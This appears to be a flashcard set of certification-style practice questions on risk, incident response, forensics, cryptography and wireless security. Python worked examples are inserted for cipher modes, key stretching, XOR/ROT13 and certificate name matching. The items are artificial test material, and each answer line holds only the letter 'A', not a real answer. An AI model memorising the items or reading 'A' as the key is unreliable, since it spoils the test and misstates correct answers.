A. Sustained redundancy
B. Maintaining of availability
C. Load-balanced distribution of job tasks
D. A single point of failure

A

Q5.10

91
Q
What form of risk analysis can involve the Delphi technique, interviews, and focus groups?
A.	Quantitative
B.	Residual
C.	Qualitative
D.	Cost-benefit
A

Q5.11

92
Q
You are the security manager for a large organization. During the yearly risk management reassessment, a specific risk is being left as is. You thoroughly document the information regarding the risk, the related assets, and the potential consequences. What is this method of addressing risk known as?
A.	Mitigation
B.	Tolerance
C.	Assignment
D.	Ignoring
A

Q5.12

93
Q
What type of security policy or plan has the following main phases: Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned?
A.	IRP
B.	BCP
C.	DRP
D.	BPA
A

Q5.13

94
Q
In what phase of an incident response plan does the organization return to normal operations after handling a violating event?
A.	Containment
B.	Lessons Learned
C.	Recovery
D.	Eradication
A

Q5.14

95
Q
When an organization is sent a lawyer’s letter demanding that they retain specific records, logs, and other files pertaining to suspected illegal activity, what is this known as?
A.	Audit
B.	Forensics
C.	Investigation
D.	Legal hold
A

Q5.15

96
Q

Which of the following are important elements in gathering data from storage devices related to a suspect’s system during a forensic investigation? (Select all that apply.)
A. Calculating a hash of the original storage device
B. Creating bitstream copy clones of the original
C. Using write-block adapters (write blockers)
D. Removing the storage device from the suspect’s system

A

Q5.16

97
Q
What is the main goal of BCP?
A.	Recover from disasters
B.	Minimize the impact of a disruptive event
C.	Keep costs to a minimum
D.	Prevent intrusions
A

Q5.17

98
Q
What form of alternate processing facility is a reliable means of recovery but is not usually considered to be cost effective?
A.	Warm
B.	Cold
C.	Onsite
D.	Hot
A

Q5.18

99
Q

A corrective control is used for what purpose?
A. To thwart or stop unwanted or unauthorized activity from occurring
B. To discover or detect unwanted or unauthorized activity
C. To modify the environment to return systems to normal after an unwanted or unauthorized activity has occurred
D. To provide various options to other existing controls to aid in enforcement and support of security policies

A

Q5.19

100
Q
Which of the following may be considered protected health information? (Select all that apply.)
A.	Phone numbers
B.	Medical record numbers
C.	Email address
D.	Vehicle identifiers
E.	Web URLs
F.	IP address numbers
G.	Biometric identifiers
H.	Photographic images
A

Q5.20

101
Q
Which of the following is most directly associated with providing or supporting perfect forward secrecy?
A.	PBKDF2
B.	ECDHE
C.	HMAC
D.	OCSP
A

Q6.01

102
Q
Which of the following symmetric-encryption algorithms offers the strength of 168-bit keys?
A.	Data Encryption Standard
B.	Advanced Encryption Standard
C.	Triple DES
D.	IDEA
A

Q6.02

103
Q
The security service that protects the secrecy of data, information, or resources is known as what?
A.	Integrity
B.	Authentication
C.	Nonrepudiation
D.	Confidentiality
A

Q6.03

104
Q
Digital signatures can be created using all but which of the following?
A.	Asymmetric cryptography
B.	Hashing
C.	Key escrow
D.	Symmetric cryptography
A

Q6.04

105
Q
When a subject or end user requests a certificate, they must provide which of the following items? (Choose all that apply.)
A.	Proof of identity
B.	A hardware storage device
C.	A public key
D.	A private key
A

Q6.05

106
Q
From a private corporate perspective, which of the following is most secure?
A.	Decentralized key management
B.	Centralized key management
C.	Individual key management
D.	Distributed key management
A

Q6.06

107
Q
When should a key or certificate be renewed?
A.	Every year
B.	Every quarter
C.	Just after it expires
D.	Just before it expires
A

Q6.07

108
Q
Which mode of operation used by symmetric encryption algorithms ensures unique cipher text by integrating an IV into the operation and linking each cipher text block to the next plain text block?
A.	Cipher Block Chaining
B.	Electronic Codebook
C.	Galois Counter Mode
D.	Counter Mode
A

Q6.08
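Worked example for the mode-of-operation question above. This is added illustration, not quiz content: a deliberately toy 8-byte block permutation stands in for a real block cipher so the script runs with the standard library alone (it is not secure; the point is the mode wrapped around it). It shows the ECB leak (equal plaintext blocks give equal ciphertext blocks) and how CBC's IV and chaining remove it.

```python
import os

BLOCK = 8


def toy_block_encrypt(key, block):
    """Invertible toy permutation standing in for AES: XOR with the key,
    then rotate the bytes left by three."""
    x = bytes(b ^ k for b, k in zip(block, key))
    return x[3:] + x[:3]


def toy_block_decrypt(key, block):
    x = block[-3:] + block[:-3]
    return bytes(b ^ k for b, k in zip(x, key))


def pad(data):
    """PKCS#7 padding so the message is a whole number of blocks."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    return data[:-data[-1]]


def blocks(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def ecb_encrypt(key, plaintext):
    """Electronic Codebook: every block encrypted independently."""
    return b"".join(toy_block_encrypt(key, p) for p in blocks(pad(plaintext)))


def cbc_encrypt(key, iv, plaintext):
    """Cipher Block Chaining: each plaintext block is XORed with the previous
    ciphertext block (the IV for the first one) before encryption."""
    out, prev = [], iv
    for p in blocks(pad(plaintext)):
        c = toy_block_encrypt(key, xor(p, prev))
        out.append(c)
        prev = c
    return b"".join(out)


def cbc_decrypt(key, iv, ciphertext):
    out, prev = [], iv
    for c in blocks(ciphertext):
        out.append(xor(toy_block_decrypt(key, c), prev))
        prev = c
    return unpad(b"".join(out))


def repeated_block_count(ciphertext):
    """Number of distinct ciphertext blocks that occur more than once."""
    bs = blocks(ciphertext)
    return sum(1 for b in set(bs) if bs.count(b) > 1)


def demo():
    key = bytes(range(1, BLOCK + 1))   # constructed fixed key
    iv = os.urandom(BLOCK)             # fresh, unpredictable IV per message
    msg = b"ATTACK!!" * 4              # four identical plaintext blocks
    ecb = ecb_encrypt(key, msg)
    cbc = cbc_encrypt(key, iv, msg)
    assert cbc_decrypt(key, iv, cbc) == msg
    return {
        "ecb_repeats": repeated_block_count(ecb),
        "cbc_repeats": repeated_block_count(cbc),
        "same_iv_same_ct": cbc_encrypt(key, iv, msg) == cbc,
        "new_iv_same_ct": cbc_encrypt(key, os.urandom(BLOCK), msg) == cbc,
    }
```

The dictionary returned by `demo()` makes the quiz claim concrete: ECB repeats a ciphertext block for every repeated plaintext block, CBC does not, and reusing an IV with the same key and message reproduces the same ciphertext, which is why the IV must be fresh for every message.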

109
Q
You are the communications officer for a large organization. Your data transfer system encrypts each file before sending it across the network to the recipient. There have been issues with the keys being intercepted as they are sent along the same path as the protected files. What alternative system should be used for key exchange?
A.	Ephemeral
B.	Out-of-band
C.	Sequential
D.	Synchronized
A

Q6.09

110
Q

Place the steps for creating a digital signature in correct order.
A. The receiver uses the sender’s public key to decrypt the digital signature and thus extract the hash.
B. The sender computes a hash of the message.
C. The complete message package is sent to the receiver.
D. The sender attaches the encrypted hash to the message.
E. The receiver computes a hash of the message.
F. The sender writes a message.
G. The receiver compares the two hash values.
H. The receiver strips off the encrypted hash (the digital signature).
I. The sender uses the sender’s private key to encrypt the hash.
1. H, G, E, B, D, F, A, C, I
2. F, I, G, A, D, H, C, B, E
3. C, A, E, I, B, D, G, H, F
4. F, B, I, D, C, H, A, E, G

A

Q6.10

111
Q
You are a programmer with a new app for use on smartphones. Your app provides users with a means to securely store personal data, such as their calendar, financial information, and personal contacts in an encrypted container. There is concern that users will be unable to remember a long random encryption key, but you want to use something stronger than just a remembered password. What technique can be used to minimize the information remembered by the user while maximizing the security of the encryption?
A.	Session key
B.	Ephemeral key
C.	Key stretching
D.	Secret algorithm
A

Q6.11
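Worked example for the key-stretching question above. This is added illustration, not quiz content: PBKDF2-HMAC-SHA256 from the Python standard library turns a remembered passphrase plus a stored random salt into a fixed-length container key. The iteration count, passphrases and salts are constructed values for illustration; tune the count so a derivation takes a noticeable fraction of a second on the target device.

```python
import hashlib
import os

ITERATIONS = 600_000   # assumption: tune so one derivation costs ~0.25 s on the device


def derive_key(password: str, salt: bytes, iterations: int = ITERATIONS, length: int = 32) -> bytes:
    """Stretch a user-remembered passphrase into an encryption key.
    The salt is stored beside the container (it is not secret); the iteration
    count makes each guess cost an attacker the same work it costs the app."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=length)


def new_container_header(password: str):
    """Create the metadata stored with a new encrypted container and its key."""
    salt = os.urandom(16)
    header = {"kdf": "pbkdf2-hmac-sha256", "salt": salt, "iterations": ITERATIONS}
    return header, derive_key(password, salt)


def unlock(password: str, header: dict) -> bytes:
    """Re-derive the container key from the stored parameters."""
    return derive_key(password, header["salt"], header["iterations"])


def properties():
    """Show the behaviour that matters: determinism, salt and password sensitivity."""
    salt = bytes.fromhex("00112233445566778899aabbccddeeff")  # constructed salt
    k1 = derive_key("correct horse battery", salt, iterations=1000)
    k2 = derive_key("correct horse battery", salt, iterations=1000)
    k3 = derive_key("correct horse battery", os.urandom(16), iterations=1000)
    k4 = derive_key("correct horse batterY", salt, iterations=1000)
    k5 = derive_key("correct horse battery", salt, iterations=1001)
    return {
        "deterministic": k1 == k2,
        "salt_changes_key": k1 != k3,
        "password_changes_key": k1 != k4,
        "iterations_change_key": k1 != k5,
        "key_bytes": len(k1),
    }
```

The salt stops an attacker from precomputing one table that works for every user, and the iteration count slows each guess; together they are what let a memorable passphrase protect a 256-bit key. Store the header, never the derived key.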

112
Q
What is the least effective form of security?
A.	Ephemeral keys
B.	Security through obscurity
C.	Implicit deny
D.	Authentication using certificates
A

Q6.12

113
Q
As a security-focused systems designer, you need to select the means by which symmetric keys are generated and exchanged between communication endpoints. Which of the following will provide your product with the most secure solution?
A.	Digital envelopes
B.	Static keys
C.	ECDHE
D.	Sequential keys
A

Q6.13

114
Q
What is the result of the following calculation: 1 0 0 1 0 0 1 1 ⊕ 0 0 0 1 1 1 0 0?
A.	1 0 0 1 1 1 1 1
B.	0 0 0 1 0 0 0 0
C.	0 1 1 1 0 0 0 0
D.	1 0 0 0 1 1 1 1
A

Q6.14

115
Q

Given the ROT13 matrix that follows, what is the plain text of the following cipher text: frphevgl ebpxf?
PT: A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
CT: N O P Q R S T U V W X Y Z A B C D E F G H I J K L M
A. Windows rules
B. Security rocks
C. Ephemeral crypto
D. Cracking keys

A

Q6.15
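Worked example for the XOR and ROT13 questions above. This is added illustration, not quiz content: a bit-string XOR and a ROT13 routine, plus the property that makes XOR the core of stream ciphers and one-time pads (applying the same key twice gives the plaintext back) and the property that makes ROT13 its own inverse.

```python
import string


def xor_bits(a: str, b: str) -> str:
    """XOR two equal-width bit strings written as '0'/'1' characters;
    spaces (as in the quiz notation) are ignored."""
    a, b = a.replace(" ", ""), b.replace(" ", "")
    if len(a) != len(b):
        raise ValueError("operands must have the same width")
    return "".join("1" if x != y else "0" for x, y in zip(a, b))


def xor_round_trip(plain: str, key: str) -> bool:
    """XOR is its own inverse: (P xor K) xor K == P."""
    return xor_bits(xor_bits(plain, key), key) == plain.replace(" ", "")


def rot13(text: str) -> str:
    """Shift every letter 13 places, leaving other characters alone."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + 13) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + 13) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def rot13_table():
    """The PT/CT rows from the quiz, regenerated from the function."""
    return " ".join(string.ascii_uppercase), " ".join(rot13(string.ascii_uppercase))
```

Because 13 is half of 26, `rot13(rot13(x)) == x`, so the same routine both encodes and decodes; ROT13 hides nothing from anyone who knows it is in use, which is why it counts as obfuscation rather than encryption.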

116
Q
What form of wireless security can use a RADIUS server to authenticate a wireless client?
A.	WEP
B.	WPA PSK
C.	WPA2 Enterprise
D.	WPS
A

Q6.16

117
Q
What form of EAP is considered one of the strongest options, negotiates security using digital certificates similar to HTTPS, and can function over wireless connections?
A.	EAP-FAST
B.	EAP-SIM
C.	PEAP
D.	EAP-TLS
A

Q6.17

118
Q

You are the manager of a restaurant and want to offer your customers wireless connectivity to the Internet. You are concerned that non-patrons will abuse the system and you therefore want to limit access to paying customers. Which of the following solutions would be able to accomplish this?
A. Use an open WiFi network with a hidden SSID.
B. Use a captive portal requiring a code that is provided to customers just after they place their drink order.
C. Post a sign on the wall with the WiFi name and password.
D. Track the MAC addresses of each wireless user and block those that abuse the system.

A

Q6.18

119
Q
You are implementing a new web server for your organization. There have been issues in the past with hackers impersonating your site in order to harm your clients and visitors. What certificate-based tool can be used to reduce the risk of site impersonation?
A.	Pinning
B.	Stapling
C.	Key escrow
D.	Offline CA
A

Q6.19

120
Q
What type of certificate will enable an organization to verify six specific subdomains with a single certificate but not allow other subdomains to be included?
A.	Wildcard
B.	SAN
C.	Root
D.	Domain validation
A

Q6.20
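Worked example for the SAN versus wildcard question above. This is added illustration, not quiz content: a hostname matcher that follows the RFC 6125 rule (a wildcard covers exactly one left-most label) applied to two constructed certificates, one listing six specific subdomains as subjectAltName entries and one wildcard. It shows why the SAN certificate verifies exactly those six names and nothing else, while the wildcard verifies any single-level subdomain.

```python
def name_matches(cert_name: str, host: str) -> bool:
    """Match one dNSName from a certificate against a requested hostname."""
    cert_name = cert_name.lower().rstrip(".")
    host = host.lower().rstrip(".")
    if not cert_name.startswith("*."):
        return cert_name == host
    # Wildcard: "*.example.com" covers "a.example.com" but not "example.com"
    # (no label to match) or "b.a.example.com" (two labels).
    suffix = cert_name[1:]             # ".example.com"
    if not host.endswith(suffix):
        return False
    left = host[:-len(suffix)]
    return left != "" and "." not in left


def cert_covers(san_names: list, host: str) -> bool:
    """True if any SAN dNSName in the certificate matches the host.
    Modern clients ignore the CN when SANs are present, so only SANs are checked."""
    return any(name_matches(n, host) for n in san_names)


# Constructed certificates: six explicit subdomains versus one wildcard.
SAN_CERT = [f"{label}.example.com" for label in ("www", "mail", "vpn", "api", "sso", "cdn")]
WILDCARD_CERT = ["*.example.com"]


def compare(host: str) -> dict:
    """Which of the two certificates would validate for the given host."""
    return {"san": cert_covers(SAN_CERT, host), "wildcard": cert_covers(WILDCARD_CERT, host)}
```

`compare("vpn.example.com")` succeeds for both certificates; `compare("staging.example.com")` succeeds only for the wildcard, which is exactly the exposure an organization avoids by enumerating subdomains in a SAN certificate. Neither certificate covers the bare `example.com` or a second-level name such as `dev.api.example.com` unless those are listed explicitly.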